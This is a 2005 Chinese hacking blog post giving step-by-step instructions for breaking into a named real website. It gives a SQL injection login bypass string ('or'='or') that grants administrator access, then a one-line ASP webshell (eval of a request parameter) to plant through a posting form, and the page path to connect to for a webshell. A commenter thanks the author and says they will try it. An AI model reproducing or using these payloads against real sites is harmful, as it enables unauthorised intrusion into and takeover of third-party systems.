Category: 原创作品
2005-12-08 22:25:30 by: h4x0r

黑掉china-ki.com的方法

Font Size: Large | Medium | Small
被黑页面http://www.china-ki.com/dht.htm

http://zhaoshang.china-ki.com/
这里的登陆没有过滤
用户名
密码里输入'or'='or'
就可以饶过验证,直接已管理员身份进入

尊敬的用户:'or'='or',您好!

然后插入一句话木马

进入→发布项目信息 →项目名称消息里写一句话木马
这里的S端<%eval(request("h4x0r"))%>自己变形不多说了
然后发布,就OK了。

用客户端连接http://zhaoshang.china-ki.com/job.asp
就得到WEBSHELL了...
[Last Modified By h4x0r, at 2005-12-08 22:35:43]
Comments Feed Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=315

View Mode: Show All | Comments: 2 Trackbacks: 0 Toggle Order | Views: 753
Quote 蜜罐
[ 2005-12-30 21:40:18 ]
[smile] 果然没有过滤,呵呵 谢谢了 拿来玩玩~~嘿嘿
Quote safeng
[ 2007-03-24 15:42:15 ]
safeng~~go

Post Comment
Smilies
[smile] [confused] [cool] [cry]
[eek] [angry] [wink] [sweat]
[lol] [stun] [razz] [redface]
[rolleyes] [sad] [yes] [no]
[heart] [star] [music] [idea]
Enable UBB Codes
Auto Convert URL
Show Smilies
Hidden Comment
Username:   Password:   Register Now?
Security Code * Please Enter the Security Code